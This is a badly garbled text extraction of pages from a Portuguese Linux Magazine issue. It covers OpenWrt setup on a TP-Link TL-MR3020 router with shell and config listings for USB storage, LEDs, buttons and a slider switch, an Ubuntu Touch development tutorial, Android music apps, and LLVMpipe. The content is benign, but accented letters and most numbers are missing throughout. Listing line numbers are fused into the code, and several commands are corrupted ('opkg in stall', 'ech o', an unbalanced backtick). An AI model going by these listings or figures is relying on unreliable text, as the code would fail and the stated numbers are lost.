14/29


alterar a configurao dos pontos de

montagem no arquivo /etc/config/

fstab. As linhas 10-16na listagem 4so importantes. A ltima linha dalistagem 3copia todo o sistema dearquivos raiz para o pendrive. Criarum backup agora aconselhvel. O

sistema ainda far o boot, mesmosem o pendrive inserido: neste caso,

ele simplesmente ignora os dispo-sitivos no existentes.

Depois de um reboot com um

pendrive, finalmente teremos mais

espao em disco. Quaisquer pa-

cotes adicionados agora poderoser armazenados l. Isto posto, tero sistema de arquivos raiz em umdispositivo USB muito til. Pode-

mos modificar a configurao comos editores habituais em um PC efacilmente copiar os dados entre os

locais (por exemplo, para backups).

Neste ponto, a configurao bsica

est concluda, exceto por algumascoisas, como o hostname. O restante

do procedimento depende de como

ser utilizado o roteador, sendo pos-

svel usar o gerenciador de pacotespara recuperar e configurar o soft-

ware necessrio. O procedimento

no OpenWrt no diferente do dequalquer outro tipo de distribuio.

Botes e LEDsPor meio da interface web ou SSH,

podemos controlar completamenteo TL-MR como um mini servidor.

No entanto, mais fcil utilizar os bo-tes existentes. O boto WPS original adequado para desencadear aesindividuais, e o interruptor (slide switch)

na lateral (com trs posies) faz a co-

mutao entre as diferentes condies

de operao (mais sobre isso depois).

Os LEDs servem como uma espcie

de dispositivo de sada. Trs estadosdiferentes so possveis: ligado, des-ligado ou piscando. Em combinaocom os botes, podemos compilar

alguns recursos interessantes. Do pon-

to de vista tcnico, preciso controlar

os LEDs nos arquivos abaixo de /sys/class/leds(por exemplo, para o WPSLED, este o diretrio/sys/class/leds/

tp-link:green:wps). Os fabricantes doOpenWrt escondem a complexidade,

Quadro 2: Como configurar o OpenWRTO sistema de configurao OpenWrt continua a ser muito consistente emtodos os pacotes relacionados ao sistema. Todos os arquivos de configu-rao esto localizados em /etc/confige so estruturados apenas arqui-vos de texto simples que so mais facilmente alterados em um editor.Para a operao de produo do roteador posteriormente, a interfaceweb a alternativa preferida do editor: aqui, pode-se facilmente mo-dificar os parmetros de configurao individuais e consultar o estado

do sistema (fgura 4). Outra alternativa uma interface para a linha decomando. O comando:

$ uci get system.slider.handler

l o valor da opo handler na seo slider do arquivo /etc/config/sys-tem. Para scripts, a biblioteca /lib/functions.sh oferece alguns utilitriosque facilitam significativamente a definio das configuraes.

Listagem 3: Preparao do pendrive USB01# Set up the root filesystem on a USB stick02# Basic USB support (USB 1.1 and USB 2)03opkg update04opkg install kmod-usb-uhci kmod-usb-ohci kmod-usb205insmod uhci06insmod usb-ohci07insmod usbcore08insmod ehci-hcd0910# USB Storage (FAT requires additional modules11# that you can upgrade later, however)12opkg in stall kmod-usb-storage-mount

block kmod-fs-ext4-core kmod-scsci1314# Prepare USB stick (on the PC)15# -> Partition with three partitions (root, home, swap)16# fdisk /dev/sdb etc.17# -> Format partitions with ext4 or swap18# mkfs.ext4 /dev/sdb119# mkfs.ext4 /dev/sdb220# mkswap /dev/sdb32122# Prepare root on USB (copies old root file system)

23mkdir -p /mnt/usb24mount /dev/sda1 /mnt/usb25tar -cvf - -C /overlay . | tar -xf - -C /mnt/usb26umount /mnt/usb

Listagem 4: Configure ospontos de montagem01# Configure mountpoints02config global automount03option from_fstab 104option anon_mount 10506config global autoswap07option from_fstab 1

08option anon_swap 00910config mount11option target /overlay12option device /dev/sda113option fstype ext414option options rw,sync15option enabled 116option enabled_fsck 01718config mount19option target /home20option device /dev/sda221option fstype ext422option options rw,sync23option enabled 124option enabled_fsck 12526config swap27option device /dev/sda328option enabled 1


15/29


e o usurio normalmente s precisaeditar a configurao no arquivo /etc/

config/system(listagem 5, linhas -).Normalmente, o OpenWRT con-

templa um conjunto de LEDs que

identifica os estados de funciona-

mento de componentes individuais,

tais como a rede ou interface USB.No entanto, podemos ajustar os pa-

dres para atender s necessidadesde cada usurio. Configurar o switch

tambm fcil. Precisamos configurar

os eventos do sistema do kernel, para

que ele acione (triggers) os botes de

evento apropriados. Para fazer isso,edite o arquivo /etc/hotplug2.rulese remova o cursor antes da string

^Buttons. Como esta uma lista deexcees, habilitamos os eventos

para os botes removendo o sinal

de comentrio. A partir de agora, o

sistema executa todos os scripts nodiretrio /etc/hotplug/buttonpara

cada evento do boto. As variveisBUTTONe ACTIONesto definidas.

Um exemplo que demonstra a

interao com os LEDs exibido nalistagem 6. Este script apenas parao boto WPS(linha 22), e faz com queo WPS LED pisque por trs segundos

(linhas 6-8e10) e, em seguida, apague

por mais trs segundos. Quando sol-

tamos o boto, o script aciona o LEDnovamente (linha 19). Em vez de arma-

zenar cada script individualmente no

diretrio Buttone consultar o statusdo switch l, como na listagem 5, fazsentido fazer o download de um script

de boto genrico do OpenWrt [4].Depois, podemos configurar o switch

de forma semelhante a dos LEDs em

/etc/config/system.O boto WPS est configurado

como um switch desligado aqui: sepressionarmos o boto por pelo me-

nos trs e no mximo seis segundos e

soltarmos em seguida, o sistema ser

desligado (linhas 37-42na listagem 5).

Esta etapa tambm revela o signi-ficado do programa na listagem 6; oboto do LED pisca durante trs se-gundos e, em seguida, desliga-se por

trs segundos assim no temos que

Listagem 5: Edio do arquivo/etc/config/system01# Configuring LEDs and buttons02config system03option hostname 'jupiter.

bablokb-local.de'04option timezone

'CET-1CEST,M3.5.0,M10.5.0/3'05

06config timeserver 'ntp'07list server '0.openwrt.pool.ntp.org'08list server '1.openwrt.pool.ntp.org'09list server '2.openwrt.pool.ntp.org'10list server '3.openwrt.pool.ntp.org'11option enable_server '0'1213config led 'led_usb'14option name 'USB'15option sysfs 'tp-link:green:3g'16option trigger 'usbdev'17option dev '1-1'18option interval '50'1920config led 'led_wlan'21option name 'WLAN'22option sysfs 'tp-link:green:wlan'23option trigger 'phy0tpt'2425config led 'led_lan'26option name 'LAN'27option sysfs 'tp-link:green:lan'28option trigger 'netdev'29option dev 'eth0'30option mode 'link tx rx'3132config led 'led_wps'33option name 'wps'34option sysfs 'tp-link:green:wps'

35option trigger 'default-on'3637config button38option button 'wps'39option action 'released'40option min '3'41option max '6'42option handler 'halt'4344config button45option button 'wps'46option action 'released'47option min '0'48option max '2'

49option handler 'logger wps pressed0-2s'5051config slider 'slider'52option handler '/usr/sbin/handle_

slider'

Listagem 6:Interao com o LED01#!/bin/sh02# Handle button events0304set_led_blink() {05# Switch flashing on (1s

on / 0.2 sec off)06ech o timer >

/sys/class/leds/tp-link\:green\:wps/trigger07ech o 1000 >/sys/class/leds/tp-link\:green\:wps/delay_on08ech o 200 >/sys/class/leds/tp-link\:green\:wps/delay_off09# Turn off after three

seconds10sleep 311echo none > /sys/class/

leds/tp-link\:green\:wps/trigger

12# Turn on after threeseconds

13sleep 314set_led_on15}1617set_led_on() {18# Turn on LED19ech o default-on >/sys/class/leds/tp-link\:green\:wps/trigger20}2122if [ "$BUTTON" = "wps" ];

then

23if [ "$ACTION" = "pressed" ];then

24set_led_blink &25else26set_led_on27fi28else29exit 030fi

Listagem 7: Checando ostatus do desbloqueador01#!/bin/sh02# Read the slider (aka

BTN_0/BTN_1)03# rmmod uses underscores,

insmod uses strokes!04rmmod gpio_button_hotplug

# Remove kernel module

05echo 18 > /sys/class/gpio/export # export BTN_006echo 20 > /sys/class/gpio/

export # export BTN_107cat /sys/class/gpio/gpio18/

value > /var/run/BTN_0 #Status BTN_0

08cat /sys/class/gpio/gpio20/value > /var/run/BTN_1 #Status BTN_1

09echo 18 > /sys/class/gpio/unexport # unexport BTN_0

10echo 20 > /sys/class/gpio/unexport # unexport BTN_1

11insmod gpio-button-hotplug# Load kernel module


16/29


contar para desligar o sistema. Da mes-

ma forma, tambm podemos usar oboto WPS para iniciar outra operao

com cliques curtos. A listagem 5(linhas

-) configura uma entrada de logpara fins de demonstrao.

Deslizar paradesbloquearO desbloqueador (slide switch) doTL-MR um pouco mais com-plicado por dois motivos. Primeiro,

o kernel no o identifica como umboto, mas como dois; mapear ostrs estados possveis conta como bits. Cada alterao de estado

aciona dois eventos, que atingemo script de processamento sequen-

cialmente, mas devem ser avaliados

em conjunto. Em segundo lugar, osistema de eventos s identifica asalteraes de estados.

Agora podemos arriscar um pe-

queno script que verifica o status dodesbloqueador durante o boot, porexemplo, para configurar o ambiente

de rede. Esse aspecto, no entanto, apenas sugestionado na documen-tao disponvel na wiki do OpenWrt.

A listagem 7mostra como: o script

armazena o status dos dois botesBTN_0eBTN_1em arquivos devidamen-

te nomeados em /var/run. O script

executado uma vez durante a ini-cializao, a partir de /etc/rc.local.

Em contraste, o script na listagem 8executado para cada evento do boto.

Ele atualiza o boto de status em /var/

run. Alm disso, ele inicia um script deprocessamento. A magia extra nas

linhas 10-12garante que apenas umscript de processamento se inicie. O

tempo de espera antes do processa-mento (linha 21) garante que todos os

eventos relevantes do boto tambm

sejam recebidos e processados. As

linhas 16e 17recuperam o script deprocessamento do arquivo de con-

figurao em /etc/config/system. O

script de processamento, em seguida,

comea na linha 22.Um exemplo do script exibido

na listagem 9. Ele l o status do des-

bloqueador e reconfigura a rede. Os

Quadro 3: Mais exemplos de aplicaesA utilidade do TL-MR3020 resultado do baixo consumo de energia e mobilidade. Ele pode ser utilizado como um servidor

de sincronizao usando o aplicativo Rsync for Android para sincronizar dados entre dispositivos mveis, o servidor eoutros computadores. Na estrada, o servidor atua como um roteador e emula uma rede domstica, sem a necessidadede reconfigurar o zoo mvel.

Cenrios de aplicao detalhados para o TLMR3020 podem ser encontrados online atravs de uma simples pesquisa na web.Estes variam de servidores web e gateways VPN a plataformas de rede social simples. Para explorar os limites do computador,tambm instalamos o ownCloud no TL-MR3020. O aplicativo precisa de um servidor web e uma pilha PHP completa.

Recursos bsicos como a visualizao e manuteno do calendrio tambm funcionam, porm mais lentamente. Alm

disso, o TL-MR3020 quebrou a reprodutibilidade ao tentar fazer o upload de vrias imagens ao mesmo tempo. Talvez umpouco de ajuste possa ajudar, mas para executar o ownCloud efetivamente, o usurio precisa de algo mais poderosono lado do hardware.

Listagem 8: Atualizao do boto de status01#!/bin/sh02# Handle slider events03. /lib/functions.sh04DELAY=505LOCK=/var/run/slider.lock0607# --- Run Update (asynchronous) ---08run_handler() {09# Only start if not already active10if ! mkdir "$LOCK" 2>/dev/null; then11logger "update-script already running"12exit 013fi1415# Read processing script from /etc/config/system16config_load system17config_get handler slider handler18logger "handler-script: $handler"1920logger "wait $DELAY seconds for all events"21sleep $DELAY22eval $handler # Execute handler23rm -fr "$LOCK"24}2526# --- Main Program ------------------27logger "Process event '$ACTION' for $BUTTON"

2829# Ignore WPS button30if [ "$BUTTON" = "wps" ]; then31exit 032fi3334# Update button file to match event35if [ "$ACTION" = "pressed" ]; then36echo "1" > "/var/run/$BUTTON"37else38echo "0" > "/var/run/$BUTTON"39fi40# Run asynchronously41run_handler & # (do not block event handling)


17/29


arquivos de rede atuais so apenas

links simblicos; assim, a reconfigu-

rao consiste em apontar os linkssimblicos para os novos arquivosde configurao. Por exemplo,/etc/

config/network.APcontm a configu-

rao de rede quando o cursor dedesbloqueio est na posio AP. Faz

sentido iniciar o script de processa-

mento no momento da inicializao

(em /etc/rc.local), aps a leitura do

status do cursor.

ConclusoNeste artigo explicamos o hardware,

assim o usurio apenas precisa com-

binar os componentes individuais.

Para informaes mais detalhadassobre a obteno de um dispositivo

de conexo UMTS para executar ouimplementar cenrios de rede espe-

cficos, consulte a wiki do OpenWrt.O pequeno roteador TL-MR

no pode cobrir todas os aplicativos

(quadro 3). No entanto, os mecanis-

Listagem 9:Processamento do script01#!/bin/sh02# Processing script for the slider03logger "Execute $0"0405# Read status of slider

06if [ cat /var/run/BTN_0` = "0" ]; then07slider="WISP"08elif [ cat /var/run/BTN_1` = "0" ]; then09slider="3G"10else11slider="AP"12fi13logger "Status of slider: $slider"1415# Remove old symlinks16rm /etc/config/dhcp17rm /etc/config/network18rm /etc/config/wireless1920# Set new symlinks

21ln -s dhcp.$slider /etc/config/dhcp22ln -s network.$slider /etc/config/network

23ln -s wireless.$slider /etc/config/wireless

2425# Restart network and DHCP26/etc/init.d/network restart27/etc/init.d/dnsmasq restart

mos descritos aqui so pelo menos

similares para outros dispositivos,incluindo os de outros fabricantes.Na extremidade superior do espec-

tro de potncia esto os dispositivos

QNAP NASque vm munidos com

o OpenWrt. No entanto, a gama deservios pr-configurados torna apersonalizao mais difcil.n

Mais informaes[1]TP-Link: http://www.tp-link.com.de/

[2]Projeto OpenWrt:ht-tps://openwrt.org

[3]Detalhes para TL-MR3020:http://wiki.openwrt.org/

toh/tp-link/tl-mr3020/

[4]Processamento genri-

co de botes de eventos:https://dev.openwrt.org/

browser/trunk/target/li-

nux/atheros/base-files/etc/

hotplug.d/button/00-button/

Disponvel no site

www.LinuxMagazine.com.br

Principais comandos de

configurao de um

roteador Cisco

Temas e configuraes

avanadas

Segurana, dicas, truques

e resoluo de problemas

Coleo

Academy!


18/29


Desenvolvimento

para Ubuntu TouchAprenda a desenvolver aplicativos para o Ubuntu Touch

e torne seu dispositivo mvel em um computador Linux de bolso!

por Alessandro de Oliveira Faria (Cabelo)

Na edio anterior da Linux

Magazine, falei sobre a ins-

talao, configurao e ou-

tros detalhes para que o leitor possainiciar no mundo do Ubuntu Touch.

Nesta edio, vou abordar o desen-

volvimento para esta til plataforma.

A tecnologia utilizada no Ubun-

tu SDK o Qt (e como ambiente de

desenvolvimento o Qt Creator). Uti-

lizei para testes o ambiente Ubuntu

. para compilao do exemplo

e ressalto que outras distribuies

tambm funcionam mas demandam

maior esforo e ateno detalhes

adicionais, que no so o objetivo

deste artigo. Os comandos para

instalar o Ubuntu SDK so:

sudo add-apt-repositoryppa:canonical-qt5-edgers/qt5-propersudo add-apt-repositoryppa:ubuntu-sdk-team/ppa

sudo apt-get updatesudo apt-get install ubuntu-sdknotepad-qml

Agora que o SDK est instalado,

inicie a interface de desenvolvimento

do Qt (Qt Creator, fgura 1), pressio-

ne a tecla[CTRL+N]

e na janela dedilogo, selecione a opo Ubuntu

Touch/Simple UI/Choose. Defina o

nome do projeto, a localizao do

diretrio e clique em Next. Ao tr-

mino do processo, ser exibido um

resumo do projeto; ento clique no

boto Finish(fgura 2).

Para facilitar o incio do desenvol-

vimento, insira o cdigo presente no

endereo[1]no arquivo.qmle execute

o programa, pressionando o atalho

[Ctrl+R]ou execute-o diretamente

pelo terminal atravs do comando:

qmlscene [caminho-completo-do-arquivo.qml]

Resumidamente, este programa

obtm os valores vigentes de cota-

o das moedas mundiais pelo site

do European Central Bank atravs deum XML[2]e efetua o clculo de con-

verso durante a digitao do valor no

campoFieldTextou atravs da seleco

do tipo da moeda (Buttom) (fgura 3).

Um breve resumo do desenvolvimento

bsico de aplicativos encontra-se em

[3]. A partir daqui, partiremos para o

Deploydo aplicativo.

Vamos enviar o aplicativo para o

Ubuntu Touch, mas para obter sucesso

devemos efetuar as devidas configura-

es. Em primeiro lugar, conecte o cabo

USB no dispositivo e no computador

e selecione Devicesou Dispositivos

na interface do seu Qt Creator para

estabelecer a comunicao (fgura 4).

Tutorial

Figura 1O ambiente de desenvol-vimento utilizado o Qt Creator. Figura 2 Resumo da criao do novo projeto.


19/29


device para copiar automaticamen-

te as configuraes de rede sem fio

(senha, SSID , canal e outros). Aps

este procedimento a instalao do

openssh-serverser iniciada para que

seja possvel acessar o aparelho

em modo desenvolvedor (fgura 5).Vale a pena mencionar que, no

modo avanado, algumas opes

como atualizao da imagem, reboot

e outros recursos esto disponveis.

Uma vez que o dispositivo esteja

configurado no modo debug, basta

pressionar o atalho [CRTL+F]para

enviar o aplicativo para o dispositivo

detectado e execut-lo.n

Para identificar o aparelho, cli-

que no boto Detect Devices ou

dependendo do estado do dispo-

sitivo, clique em Redetect Devices.

O nmero serial do dispositivo ser

exibido no canto superior esquer-

do se tudo estiver funcionando

corretamente. Se o Ubuntu Touch

estiver com a rede sem fio configu-

rada, clique em Enable developer

mode, caso contrrio clique em

clone network config from host to

Figura 3 Tela de digitao de dados do conversor de moedas paraUbuntu Touch.

Mais informaes[1] Download do cdi-go deste artigo: http://www.linuxmag.com.br/is-sues/106/conteudoqml.txt

[2] XML da cotao do dia

das moedas mundiais: http://www.ecb.int/stats/euro-fxref/eurofxref-daily.xml

[3] Desenvolvimento paraUbuntu:http://developer.ubuntu.com/get-started/gomobile/#step-write-app

[4] Exemplo (cdigo fontecompleto) do conversor demoedas para Ubuntu Tou-ch:https://bazaar.launchpad.net/~dpm/+junk/CurrencyCon-verterUpdated/files/8

Figura 5 Modo de desenvolvedor habilitado.

Figura 4 Deteco de dispositivos no Qt Creator.

Gostou do artigo?Queremos ouvir sua opinio.

Fale conosco em:[email protected]


Alessandro de Oliveira Faria scio-fundador da

empresa NETi Tecnologia fundada em 1996, empresa

especializada em desenvolvimento de software e

solues biomtricas. consultor biomtrico na

tecnologia de reconhecimento facial, atuando na rea

de tecnologia desde 1986, levando o Linux a srio

desde 1998, membro colaborador da comunidade

Viva O Linux, mantenedor da biblioteca open-source

de vdeo captura, embaixador e membro openSUSE

entre outros projetos.


20/29


Aperte o play!Os melhores aplicativos de msica e truques para melhorar a qualidade de som do seu Android.

por Flvia Jobstraibizer

Ningum vive sem msica.

Essa uma mxima na qual

esta humilde autora acredita

piamente. Mesmo os ermites em

algum momento cantarolam algu-

ma msica em meio sua solido. O

Android possui excelentes aplicati-

vos para msica, seja para execuo,

organizao de biblioteca musical

ou mesmo para localizar podcasts,

audiolivros e outros recursos. Tam-

bm h diversos truques e macetes

que podemos fazer para melhorar

a qualidade de audio dos disposi-

tivos equipados com o simptico

sistema do robozinho.

Msica napalma da mo

Alguns aplicativos j conhecidos paraexecuo de msicas como NPlayer

[1], possuem uma organizao inte-

ressante da biblioteca musical, onde

as faixas podem ser localizadas atra-

vs de uma nuvem de tags, com-

posta pelo nome do cantor, nome

da msica ou mesmo pelo tipo de

msica (fgura 1). A organizao por

capas de lbuns (fgura 2) tambm

outro recurso presente no NPlayer e

comum a outros importantes tocado-

res de msicas, como o MusiXMatch

[2](quem se lembra do Music Match

Jukebox que existia pra Windows nos

anos ? Este se parece MUITO com

ele). Atualmente o MusiXMatch um

dos preferidos por quem deseja alm

dos recursos comuns acompanhar

as letras das msicas em tempo real

(e com tempo real, quero dizer que

o aplicativo baixa a letra da msica

enquanto ela executada, contanto

que uma conexo de Internet estejadisponvel). O aplicativo possui um

bom equalizador, que auxilia o usurio

a predefinir o melhor ambiente de som

possvel em seu dispositivo (fgura 3).

O bom e velho Winamp tambm

modernizou-se e veio parar nos dis-

positivos mveis. A organizao de

msicas por pastas um diferencial,

evitando a mistura homrica feita

por outros players (fgura 4). O apli-

cativo est disponvel em duas ver-

Android

Figura 1Organizao de audio por palavras-chave, intrpretes outipo de msica.

Figura 2As capas dos lbuns tambm podem ser uma forma deorganizar o contedo.


21/29


ses: gratuita[3]e Pro, com recursos

adicionais como a organizao por

pastas, claro, e outros diferenciais

como o a execuo de qualquer audio

streaming atravs de um URL direto.

O PowerAmp [4]talvez seja um

dos mais completos no que tange

configuraes de audio. Possui o

mais completo equalizador (fgura 5),

configurao de balano, baixos e ou-

tros bastante sensvel e ainda possui

widgets personalizveis para que seja

possvel inclu-lo na rea de trabalho

sem engasgos da msica. Tais recursos

esto presentes apenas na verso Pro

(que custa cerca de R,) que vale

muito a pena ser adquirida.

Para ouvir rdio, no limite-se ao

aplicativo padro do Android (e h

alguns dispositivos importados que

nem mesmo este aplicativo padro

possuem). Neste campo, as opes

so inmeras. O TuneIn [5] um dos

mais populares e funciona basicamente

atravs da Internet. Com ele possvel

ouvir mais de estaes de rdio

via streaming e que podem ser locali-

zadas por tipo, localizao (somente

rdios do Brasil, por exemplo) e at

mesmo por idioma (fgura 6).

Aumente o

poder de audioAlguns aplicativos podem ajudar a

melhorar o poder de audio do seu dis-

positivo. Mesmo dispositivos um tanto

quanto limitados podem beneficiar-se

obtendo melhor qualidade de audio,

Figura 5 O PowerAmp possui um dos mais completos equalizadores.

Figura 6Para ouvir mais de 70000 rdios online, o TuneIn a melhor opo.

Figura 3Equalizador do MusiX-Match, til para melhorar a qua-lidade do audio em execuo.

Figura 4A organizao por pastasdo Winamp Pro um diferencialdo aplicativo.


22/29


tratamento de ruidos e sensibilidade

mais refinada em graves e agudos.

Um exemplo disso o Music Volu-

me EQ[6], que alm de gratuito um

dos aplicativos mais bem avaliados no

quesito aumentar o volume do som

do aparelho, alm de possuir confi-

guraes refinadas para melhorar a

qualidade do audio (fgura 7).

O Equalizer [7] outro aplicati-

vo interessante. Em meus testes, a

galeria de efeitos pr-configurados

(fgura 8) rendeu surpresas pois a

qualidade e nitidez do som melho-

raram significativamente, at mes-

mo em audio extrado da Internet.

Um dos mais surpreendentes no

entanto, o aplicativo Ambiance[8],

que gera aleatoriamente cerca de

efeitos sonoros que isolam o

barulho externo (claro que ter um

fone de ouvido de tima qualidade

vai garantir esse excelente resultado).

Com um fone de ouvido da Phillips

que j possui o recurso de isolamen-to de barulho, obtive a inacreditvel

chance de no escutar nada alm

da msica que estava ouvindo, em

meio ao trnsito catico de So Pau-

lo enquanto me dirigia redao

da Linux Magazine. O aplicativo

possui ainda recursos como des-

pertador com sua msica preferida

e at gravador de audio (til para

gravar palestras, por exemplo). Por

favor pague a bagatela de R,

neste aplicativo e surpreenda-se

assim como eu (fgura 9).

ConclusoOpes para tornar a experincia de

audio incrvel no faltam. Leia aten-

tamente os comentrios dos usu-rios antes de baixar determinados

aplicativos de audio e desconfie de

aplicativos que exigem permisses

absurdas para instalao (como um

determinado player que informa a

necessidade de acesso aos seus SMS

e catlogo de endereos no momento

da instalao), afinal, tudo o que voc

no quer ouvir uma msica triste por

conta de algum aplicativo malicioso.n

Figura 7O Music Volume EQ tur-bina significativamente o audiodo seu dispositivo.

Figura 8A galeria de efeitos pr-configurador do Equalizer surpre-ende durante o uso.

Figura 9Anular o barulho externo o recurso principal do Ambiance.

Mais informaes[1]N7Player: https://play.google.com/store/apps/details?id=com.

n7mobile.nplayer

[2] MusiXMatch: https://play.google.com/store/apps/details?id=com.mu-sixmatch.android.lyrify

[3]Winamp Free: https://play.google.com/store/apps/details?id=com.nullsoft.winamp

[4]PowerAmp: https://play.google.com/store/apps/details?id=com.ma-xmpz.audioplayer.unlock

[5]TuneIn:https://play.

google.com/store/apps/details?id=tunein.player

[6] Music Volume EQ:https://play.google.com/store/apps/details?id=hr.podlanica

[7] Equalizer: https://play.google.com/store/apps/details?id=com.smartan-droidapps.equalizer

[8]Ambiance: https://play.google.com/store/apps/details?id=com.ur-banapps.ambiance




23/29


Tubo grficoA ideia simples: se o driver da placa grfica no oferece grficos 3D, uma ajuda especial delegaria

todos os clculos 3D ao processador principal. Neste artigo, explicamos como fazer esse trabalho.

por Tim Schrmann

OStarter est inserido emuma janela com efeito vio-

leta cintilante com som-bras sutis e rodeado por um brilho

suave quando minimizado. Estes

efeitos puros da rea de traba-lho do Unity s so possveis se

o Ubuntu, ao iniciar, detectar aplaca grfica e localizar um dri-ver adequado, o que por sua vez

fornece uma acelerao D. Isso,

s vezes mas nem sempre fun-

ciona, especialmente em placas

grficas mais antigas, notebooks

e netbooks (figuras1 e 2).

LLVMpipeO Ubuntu . costumava iniciar

o Unity D, o irmo menos eficaz

do Unity. Com o Ubuntu ., aCanonical substituiu o Unity Dpelo LLVMpipe. Este driver de pla-

ca grfica invocado quando oUbuntu precisa usar a placa deextenso grfica apenas no modo

D. O LLVMpipe permite que o pro-

cessador principal controle todos

os efeitos D. Desta forma, o Unity

pode funcionar sem a acelerao

D em computadores mais antigos

ou mquinas virtuais, enquantoos desenvolvedores da Canonical

podem se concentrar em um ni-

co ambiente de trabalho Unity. O

LLVMpipe tambm pode executar

outros programas D.

A fgura 3mostra o caminho per-

corrido pelos arquivos grficos do

aplicativo at a tela. Com o Linux,

a maioria dos programas D usam

a biblioteca grfica OpenGL, queprev, entre outras coisas, algumas

funes bsicas para desenhar li-nhas e superfcies. Os detalhes so

definidos pelo padro OpenGL, que

o consrcio de indstrias Khronos

Group [1]gerencia e desenvolve.Fabricantes de placas grficas

normalmente fornecem a seusdrivers uma biblioteca OpenGLotimizada, que est intimamente

conectada maior parte dos dri-

vers proprietrios do kernel e pode,

portanto, mover rapidamente osarquivos para as placas grficas.Mas, em primeiro lugar, nem toda

placa grfica possui um driver pro-

prietrio e, em segundo lugar, no

Anlise

Figura 1 O Unity desenha uma sombra ao redor das janelas...


24/29


to fcil examinar o cdigo fonte

em caso de problemas. Felizmente,

ainda existe uma alternativa.

Drivers grficosBrian Paul comeou a desenvol-

ver a biblioteca livre e aberta na

Internet em e chamou-a de

Mesa (tambm conhecida como

Mesa D [2]). No incio, a bibliote-

ca usava o processador principal

para calcular grficos D. A sada

era relativamente lenta, mas ainda

entregava imagens D. Ento, em

, Brian Paul fundou a empresa

de consultoria Tungsten Graphics

com outros quatro especialis-tas grficos. Eles desenvolveram

um novo driver grfico chamado

GalliumD (ou apenas Gallium

[3], para abreviar) em . Aideia principal era tornar o driver

menor, para mant-lo compatvel

com outras bibliotecas grficasalm do Mesa e torn-lo maisfacilmente transportvel, o quesimplificaria significativamenteo desenvolvimento de drivers de

placas grficas. O novo sistema foi

um sucesso, pelo menos no Linux,

principalmente porque integrava

o Mesa e usava-o para sada.

Como mostrado na figura 3, o

Mesa calcula os dados D e passa-

os adiante para o chamado State

Tracker, que prepara as instrues

OpenGL para torn-las compreen-

sveis ao driver grfico GalliumD.

Cada biblioteca grfica possui um

state tracker prprio, atualmente

disponvel tambm para a biblio-

teca de grficos vetoriais OpenVG

[4]. Atravs de uma interface fixa,

o state tracker, em seguida, passa

os arquivos grficos para o driver

de placa grfica atual, tambm co-

nhecido comopipe driver. O state

tracker no executa no kernel Linux

mas no espao do usurio, assim

como muitos outros programas. Em

seguida, converte os dados em D

para que o dr iver os compreenda.

A placa grfica passa o resultadofinal para a interface chamadaGallium Winsys, a qual retorna os

arquivos para o mdulo de ker-nel apropriado placa grfica. O

mdulo do kernel, por fim, passa

os dados D para o hardware da

placa grfica. No Linux, o mdulo

do kernel geralmente conheci-

do como gerenciador de renderi-

zao direta, ou Direct Rendering

Manager(DRM).

primeira vista, a interfaceWinsys e o kernel DRM podem pa-

recer redundantes, afinal, o driver

da placa grfica deve ser capaz de

se comunicar diretamente coma placa; no entanto, estas duasetapas intermedirias so as que

tornam os drivers mais elegantes

e independentes de plataforma.

Apenas a interface Winsys preci-

sa saber qual sistema operacional

est atualmente sendo afetado e

como se comunicar com ele. Comoela apenas passa sobre os dados,

a interface pode ser pequena ecriada rapidamente. Alm disso,

a interface pode usar qualquerdriver de placa grfica, por issoprecisa ser desenvolvida apenas

uma vez para cada sistema ope-

racional. O atual driver da placa

grfica pode, portanto, permane-

cer praticamente inalterado por

todas as plataformas.

Figura 3Arquivos grficos atraves-sam alguns componentes no Linux,mas o processamento rpido.

Figura 2 ...enquanto seu homlogo Unity 2D no o faz. Aqui o usuriotem que se contentar com uma colorao mais escura.

Aplicativos (Unity)

OpenGL (Mesa)

OpenGL State Tracker

Open 3D Interface

Driver GA Winsys

Linux DRM (Kernel)

Hardware

Drivers especficos GPU(Pipe-Driver)


25/29


Para obter uma visualizao Dacelerada no Linux, portanto, o usu-

rio precisa de um driver GalliumD

que se encaixe na placa grfica e um

mdulo do kernel DRM correspon-

dente. Infelizmente, os principaisfabricantes de cartes grficos fa-

zem criaes prprias, de modo que

os desenvolvedores livres acabam

tendo que viol-los mais uma vez.

Atualmente os drivers GalliumD

esto disponveis para hardwareIntel e algumas placas grficas ATI;a NVidia, entretanto, suporta o co-

nhecido driver Nouveau.

Como os fabricantes no publi-

cam detalhes de hardware em seus

chips grficos, o desenvolvimento

de drivers livres geralmente um

processo tedioso. Ainda hoje, oNouveau no fornece dados de de-

sempenho para seu driver proprie-

trio da NVIDIA. Como a Tungsten

Graphics agora pertence VMware,

fabricante de virtualizadores de mes-

mo nome, no nenhuma surpre-

sa que exista um driver GalliumD

para a placa grfica simulada das

mquinas virtuais.

Por dentro do pipeComo referncia e modelo para dri-vers aspirantes a leitores, a equipe

GalliumD fornece o softpipe driver.

Este driver executa os clculos D

do processador, uma transaoque extremamente longa e no

apropriada para uso dirio. JosFonseca, dessa forma, surgiu com

a ideia de rebaixar o softpipe driver

no compilador LLVM (quadro 1). Ele

e alguns colegas, entre eles Brian

Paul, inventor do Mesa, ajustaram o

softpipe driver com um rasterizador

Figura 4 Com o compilador LLVM, um frontend, como o compilador Clang C, cria um cdigo interme-dirio que um backend transfere para um programa, digamos, de processador x86, aps a otimizao.

Figura 5 Como reporta o glxinfo na linha destacada, o Unity exe-cuta sob o LLVMpipe. Podemos testar o LLVMpipe em uma mquinavirtual, como neste exemplo.

Quadro 1: Compilador LLVMO LLVM um compilador modular [7]. Primeiro, um componente frontend traduz o cdigo fonte para a lingua-

gem especial LLVM Intermediate Representation(IR) (gura 4). O cdigo do programa otimiza o LLVM antes deentreg-lo ao backend, o atual programa do processador especfico. Embora o processo parea complicado, o sis-

tema todo extremamente rpido, e o idioma LLVM IR pode ser executado em uma mquina virtual (gura 5). Paraacelerar ainda mais o processo, o usurio encontrar disponvel um compilador [8]que faz todo o trabalho na hora.

O LLMVpipe transfere os comandos necessrios para calcular os pixels da imagem acabada para o idioma IRLLVM. Alm de pontos, linhas e tringulos, estes tambm incluem os chamadosshaders. Shaders so miniprogra-mas que realmente funcionam com a placa grfica e, em geral, produzem grandes efeitos visuais como fumaa ereflexos. O LLVMpipe transforma todos os clculos necessrios em comandos da linguagem LLVM IR e, em seguida,permite que a LLVM os traduza e execute. Para que o LLVMpipe alcance seu pleno potencial, os desenvolvedo-res recomendam um sistema de 64 bits e um processador x86 com, pelo menos, a instruo de extenso SSE2.

